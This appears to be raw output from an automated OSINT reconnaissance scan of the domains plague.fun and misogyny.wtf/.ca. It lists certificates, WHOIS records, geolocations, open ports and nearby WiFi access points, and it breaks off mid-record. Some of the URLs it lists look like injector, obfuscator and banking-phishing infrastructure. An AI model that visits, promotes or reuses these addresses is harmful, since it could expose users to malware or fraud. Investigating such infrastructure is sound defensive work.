C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 2022-12-18 00:24:47 Physical Location No MetaDefender 0 0 1 0 None Campinas, Brazil 20.195.209.219 2022-12-18 00:20:49 Physical Location No Censys 1 0 1 0 None Zurich, Zurich, 8000, Switzerland, Europe 51.103.210.236 2022-12-18 00:02:56 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: e5:46:5a:b1:fb:47:13:cc:0e:4e:81:45:49:c8:68:c3 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Sep 1 20:47:45 2022 GMT Not After : Nov 30 20:47:44 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:b8:a8:f1:ca:81:88:62:ce:b7:cb:e5:5f:70:5d: a9:d6:19:67:8b:9a:69:7c:3e:b0:1a:bf:ee:8e:41: 4b:60:c8:0e:71:b0:ee:9d:06:89:ea:42:9b:af:7c: 48:a8:dc:72:38:b2:40:b2:8b:0c:71:d6:cf:8c:4c: 53:f8:67:e4:7f:60:a0:99:71:a1:b8:43:c5:ac:14: 39:cc:43:b8:4b:37:35:d7:ce:16:69:79:a3:d5:53: e2:6e:2c:f7:a6:1f:8c:b4:ec:ce:6e:53:98:9b:ab: 62:08:cf:8d:70:8f:b2:0a:bd:98:3d:36:e1:f9:e1: bf:19:54:07:8d:e9:35:76:fe:c6:0f:41:8f:3b:e5: a6:09:2f:df:f1:e2:47:95:78:fa:a2:a2:32:98:b0: 41:0c:82:5d:b0:b9:fd:29:cd:b7:42:24:54:13:89: 34:19:e6:93:92:d4:e6:b9:ad:42:59:2a:d2:95:8b: c8:08:b5:b5:eb:f0:04:bf:bc:a5:6c:07:1a:d0:ac: 9c:9c:c8:69:a8:dd:20:73:eb:78:6f:cc:33:40:f2: ca:45:5b:11:72:b1:86:45:2f:03:d1:de:78:a2:24: 3c:ac:18:42:19:ac:73:ef:fd:c7:72:14:e3:2c:e5: 40:80:36:85:b0:76:ca:de:d3:9c:2a:c2:82:26:af: 6a:25 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5B:64:C5:97:48:7A:C9:8D:92:D2:CA:90:DF:5B:FF:61:46:87:B1:6E X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information 
Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/V-CqIJuvA-8 CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/EE-IMN5cLuw.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 2d:4d:db:39:e5:eb:23:3e:18:2b:77:dd:21:24:63:de:69:88: 0f:9e:17:b2:35:af:6e:93:1a:96:fe:0c:a3:37:af:2e:d6:43: e8:24:ee:ae:4c:2a:e5:4b:57:72:90:16:3d:61:16:54:dd:c6: 9c:eb:22:67:30:01:07:2e:49:c0:01:b6:3c:14:29:95:a2:9a: a1:63:db:08:fd:03:00:f4:54:5c:d8:4a:fc:6f:5b:26:4d:7d: 6e:43:ae:76:9e:d3:e1:69:3d:94:79:64:6c:31:03:86:51:a5: c7:ce:d8:16:24:9c:a4:8a:b7:c9:ff:56:da:53:fb:84:4b:f0: d1:e0:4e:0a:3c:53:54:98:01:77:fa:79:d4:ce:5b:1d:b2:a6: 10:93:20:f8:1c:8a:2c:af:5f:43:c4:d8:0d:53:e8:bb:41:fb: d1:7b:18:4c:9f:51:81:8a:2f:c8:da:90:df:f4:e7:d4:28:0d: 5b:1d:b4:f6:e5:90:01:1a:30:ba:7d:6c:bf:48:e6:2b:64:ea: 3a:0d:16:71:ad:c2:81:17:88:59:f8:8c:af:16:6c:9d:56:99: 20:bf:39:ed:60:8b:d6:02:c0:16:b4:76:c6:80:59:91:f8:59: 46:79:a6:23:8f:c6:43:b4:16:64:4e:77:83:33:cb:a5:f2:01: 0c:3c:cd:87 plague.fun 2022-12-18 00:40:43 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: misogyny.ca Registry Domain ID: 95142585-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: http://www.namespro.ca Updated Date: 2021-12-26T12:40:21Z Creation Date: 2021-07-07T19:00:05Z Registry Expiry Date: 2023-07-07T19:00:05Z Registrar: Namespro Solutions Inc. 
Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namespro.ca Registrar Abuse Contact Phone: +1.6046818007 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record 
identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: slns1.namespro.ca Name Server: slns2.namespro.ca DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:40:43Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) Domain Name: misogyny.ca Registry Domain ID: 95142585-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: http://www.namespro.ca Updated Date: 2021-12-26T12:40:21Z Creation Date: 2021-07-07T19:00:05Z Registry Expiry Date: 2023-07-07T19:00:05Z Registrar: Namespro Solutions Inc. 
Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namespro.ca Registrar Abuse Contact Phone: +1.6046818007 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record 
identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: slns1.namespro.ca Name Server: slns2.namespro.ca DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:40:43Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) misogyny.ca 2022-12-18 00:13:56 HTTP Status Code No Web Spider 0 0 2 0 None None https://obf.plague.fun/obf/ 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2086 188.114.97.1 2022-12-18 00:12:09 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.96.0 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 07:55:46 (Net ID: 00:02:2D:05:BB:87) 37.7803446,-122.3906132 2022-12-18 00:07:18 Web Content No Web Spider 0 0 3 0 None body { background-color: #3c4359; background: linear-gradient(140deg, #3c4359, #000); background-size: 400% 400%; -webkit-animation: background 18s ease infinite; -moz-animation: background 18s ease 
infinite; animation: background 18s ease infinite; } @-webkit-keyframes background { 0% { background-position: 5% 0% } 50% { background-position: 96% 100% } 100% { background-position: 5% 0% } } @-moz-keyframes background { 0% { background-position: 5% 0% } 50% { background-position: 96% 100% } 100% { background-position: 5% 0% } } @keyframes background { 0% { background-position: 5% 0% } 50% { background-position: 96% 100% } 100% { background-position: 5% 0% } } .content { position: absolute; top: 50%; left: 50%; margin-right: -50%; transform: translate(-50%, -50%); font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; font-weight: bold; font-size: 1.7rem; text-align: center; color: #fff; display: flex; flex-direction: column; } #text { padding: 0.8rem; border-radius: 15px; background-color: #3c4359; color: black; transition: transform .3s; } #text:hover { transform: scale(1.05); } #info { margin-top: 1rem; font-size: 1.2rem; } http://misogyny.wtf:2020/css/index.css 2022-12-18 00:08:30 IP Address No LeakIX 24 0 1 0 None 188.114.96.9 plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 089070 (Net ID: 00:02:2D:08:90:70) 37.780462,-122.390564 2022-12-18 00:05:57 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:d8:e8:f9:6e:af:5c:60:20:62:8a:c9:01:2c:b1:dd:b1:ef Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Aug 27 16:08:50 2020 GMT Not After : Nov 25 16:08:50 2020 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a4:9b:a5:f9:88:bf:e3:84:c3:a7:20:d1:1a:68: 2a:3d:5d:5c:4b:72:46:33:3f:80:e8:7a:45:73:6a: cd:07:c0:56:2b:61:7f:4c:56:dd:e0:bd:ef:24:8e: 73:91:7b:f0:e5:0c:c8:6a:13:46:77:1a:e3:50:81: 51:d2:1d:d8:a1:35:fa:0b:fa:09:37:00:58:4e:31: 
83:0e:f7:07:90:d0:0e:1e:4d:7e:52:e1:04:8b:4e: b1:28:95:49:9e:2d:53:a9:b6:0f:7d:c4:07:f0:5a: 9d:50:36:ef:b8:7b:f9:ad:59:38:88:93:89:af:c3: 25:b9:9a:a0:2e:13:8b:7e:ed:0b:3a:98:fc:89:52: 7d:f8:41:c4:2e:8d:b6:b3:09:f9:43:e5:70:bd:bd: 74:fa:e6:70:2e:e6:54:b0:82:97:a8:a9:e0:71:03: a4:73:0a:ae:0c:e7:ea:53:a5:24:3c:09:c1:da:78: ee:a9:b7:a3:8f:a6:db:2e:69:3a:ea:08:50:68:13: bd:77:60:e1:be:f1:69:20:d6:c3:b2:82:61:86:74: b7:1a:f9:fa:f1:1b:dd:5c:9c:a4:ac:c0:af:83:49: 29:00:9f:75:fc:61:8b:3c:71:21:e2:a1:7a:40:65: 1b:63:de:97:d8:3d:55:8f:6f:0b:4d:52:7c:3f:82: f7:c3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: CF:A0:FE:3E:4E:5F:7F:0F:22:5E:1D:C3:E8:1E:94:AD:7F:15:41:85 X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 03:d1:30:3c:9c:0c:76:5e:5e:8a:70:97:ba:72:33:0f:1d:98: a3:91:84:ef:de:9c:97:00:45:7f:5b:7b:ec:f0:c2:dc:25:49: 63:fb:e8:f5:ba:ed:db:30:90:c0:e5:2d:9b:cc:86:e8:04:1e: 5c:b9:18:8f:12:ef:ab:61:7f:d1:29:58:a8:7a:42:68:ae:11: ff:0b:82:22:8a:be:79:b4:68:56:47:4f:28:79:ef:61:7f:51: df:55:84:a1:56:ff:5b:4f:47:04:ef:9b:03:a9:7b:a6:1d:8f: 7b:e4:81:2b:05:de:42:59:e5:c4:89:1d:6f:b2:c3:e9:92:07: 00:f6:fb:93:99:69:52:10:c8:89:65:8b:75:04:78:4e:b6:8b: a6:5d:c9:32:51:27:3a:25:5a:96:67:00:14:2a:9a:29:bc:8c: f1:1f:97:1d:3d:b0:0a:c1:cd:99:bc:42:1c:18:be:ac:4f:e6: 72:cd:5d:a8:99:3b:6f:9a:16:da:15:8e:ef:af:9d:0f:69:63: 
f5:00:5c:c4:65:5c:d1:65:60:d6:17:d4:8e:02:b4:0e:e3:e0: 96:8d:96:e0:84:08:33:ed:8b:a7:b7:4b:20:91:d3:85:7f:17: 9f:c3:33:cf:19:5f:be:1d:f0:0e:73:88:e8:a8:b5:24:50:84: c1:0d:fc:cf 2022-12-18 00:10:05 Linked URL - Internal No URLScan.io 1 0 1 0 None https://zerotwo-best-waifu.online/778112985743251/wap/enner/injector zerotwo-best-waifu.online 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SpeedStream (Net ID: 00:01:24:F0:82:16) 37.7803446,-122.3906132 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None onlinebankingpichinchaaccount--ecuador0.repl.co 34.149.204.188 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:2052 172.67.190.129 2022-12-18 00:02:43 SSL Certificate - Raw Data No CertSpotter 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:f8:40:07:a9:2a:29:fa:95:e2:5f:ea:f2:e9:75:79:57:8e Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Nov 4 13:11:41 2022 GMT Not After : Feb 2 13:11:40 2023 GMT Subject: CN=atlas.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:e0:32:37:45:7d:4d:02:f9:aa:10:fa:d8:e8:0f: 29:c6:0a:f9:0e:81:76:85:f5:b9:b0:a4:36:23:07: 00:08:99:6b:a4:7e:21:94:8c:60:7b:0a:95:d3:8a: 8e:e0:f5:ce:17:6f:42:86:0a:0b:5a:a3:ea:41:92: 62:0f:36:29:62 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 50:DB:72:0E:7F:20:4D:E9:E5:87:34:C6:B6:D2:C8:CE:E1:5B:20:8F X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:atlas.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 
1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84: 16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52 Timestamp : Nov 4 14:11:41.192 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:61:29:22:AC:4F:7C:30:86:DB:CB:A5:62: 1A:74:E6:F0:17:04:90:2B:D9:04:A5:D2:DA:A2:8A:F3: A8:7C:6C:79:02:20:6F:4C:38:D1:94:98:CA:D0:D5:12: AA:B4:E4:1E:A2:B5:70:A7:A7:C4:FD:0A:52:BE:7D:9A: 05:67:81:D0:16:03 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C: 5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99 Timestamp : Nov 4 14:11:41.669 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:BC:8C:85:EB:BF:C4:F0:D8:87:E4:7E: 9A:66:96:15:69:77:5E:F2:F1:6F:3E:38:4A:C5:76:3E: 2C:DC:1A:EB:D2:02:20:61:78:80:BB:40:53:87:01:17: 2B:57:28:2B:12:98:D1:E2:D9:92:0D:AE:2C:2D:7E:80: A1:F9:F3:28:94:F5:0D Signature Algorithm: sha256WithRSAEncryption 81:c9:a3:c8:90:35:93:2a:8c:1b:1f:6f:e0:91:16:89:4e:d8: 16:b3:13:76:a0:ea:70:93:c4:72:12:a6:3d:f7:6c:09:d9:c7: 9c:fc:40:db:11:66:f3:17:9f:92:e1:94:35:c0:be:ba:6e:09: be:dd:47:e1:d6:58:c9:0e:de:94:20:04:f1:54:ce:02:fb:70: 50:31:09:a2:1e:93:7c:a5:04:28:a5:81:5b:c8:75:a0:3a:bf: b8:3b:81:a5:6f:5a:ac:99:2d:02:48:ac:2d:a1:3a:f1:06:cd: 57:4c:ed:e5:e9:a8:1c:25:ba:ce:4c:cd:db:56:23:21:6d:cc: dc:1d:42:f1:09:dc:28:a8:96:ae:bc:db:68:11:5b:cf:63:92: fd:93:35:33:e9:51:30:78:d8:1a:fd:54:2c:07:04:04:19:f8: b2:75:bc:ef:f1:48:56:41:8f:64:9a:f0:27:1d:eb:3b:2d:69: 8d:0d:0e:45:56:30:8e:6e:97:93:53:d5:e1:6b:b7:1c:ff:00: 58:d5:07:5e:22:d6:ce:4f:02:d8:2c:b5:9f:2e:4c:50:d4:90: 9d:17:99:b9:54:b6:e2:f8:49:96:e8:e4:9c:3f:b0:87:1f:21: 2a:69:a9:ad:a1:95:af:68:45:92:c8:bb:99:17:d4:fc:90:cb: 05:d3:da:6b plague.fun 2022-12-18 00:14:26 HTTP Status Code No Web Spider 0 0 2 0 None None https://misogyny.wtf/inject/UsRjS959Rqm4sPG4 2022-12-18 00:27:43 Similar Domain - Whois No Whois 
2 0 2 0 None Domain Name: plague.pro Registry Domain ID: 63d81ab88f224721bf7defd24d12c687-DONUTS Registrar WHOIS Server: whois.reg.com Registrar URL: Updated Date: 2022-12-03T10:20:48Z Creation Date: 2018-11-20T18:17:14Z Registry Expiry Date: 2023-11-20T18:17:14Z Registrar: Registrar of Domain Names REG.RU LLC Registrar IANA ID: 1606 Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Data Protected Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: rita.ns.cloudflare.com Name Server: augustus.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:27:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. 
Domain name: PLAGUE.PRO Registry Domain ID: 63d81ab88f224721bf7defd24d12c687-DONUTS Registrar WHOIS Server: whois.reg.com Registrar URL: https://www.reg.com Registrar URL: https://www.reg.ru Updated Date: 2022-12-03T10:20:48Z Creation Date: 2018-11-20T18:17:14Z Registrar Registration Expiration Date: 2023-11-20T18:17:14Z Registrar: Registrar of domain names REG.RU LLC Registrar IANA ID: 1606 Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited Registrant ID: Registrant Name: Protection of Private Person Registrant Street: PO box 87, REG.RU Protection Service Registrant City: Moscow Registrant State/Province: Registrant Postal Code: 123007 Registrant Country: RU Registrant Phone: +7.4955801111 Registrant Phone Ext: Registrant Fax: +7.4955801111 Registrant Fax Ext: Registrant Email: PLAGUE.PRO@regprivate.ru Admin ID: Admin Name: Protection of Private Person Admin Street: PO box 87, REG.RU Protection Service Admin City: Moscow Admin State/Province: Admin Postal Code: 123007 Admin Country: RU Admin Phone: +7.4955801111 Admin Phone Ext: Admin Fax: +7.4955801111 Admin Fax Ext: Admin Email: PLAGUE.PRO@regprivate.ru Tech ID: Tech Name: Protection of Private Person Tech Street: PO box 87, REG.RU Protection Service Tech City: Moscow Tech State/Province: Tech Postal Code: 123007 Tech Country: RU Tech Phone: +7.4955801111 Tech Phone Ext: Tech Fax: +7.4955801111 Tech Fax Ext: Tech Email: PLAGUE.PRO@regprivate.ru Name Server: augustus.ns.cloudflare.com Name Server: rita.ns.cloudflare.com DNSSEC: Unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022.12.18T03:27:43Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. 
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain information pertaining to Internet domain names registered by our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com) plague.pro 2022-12-18 00:12:31 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 104.21.7.179 2022-12-18 00:12:13 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.96.1 2022-12-18 00:03:32 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3234.webapps.net 81.88.52.234 2022-12-18 00:09:52 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.20:443 188.114.96.0/24 2022-12-18 00:06:24 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 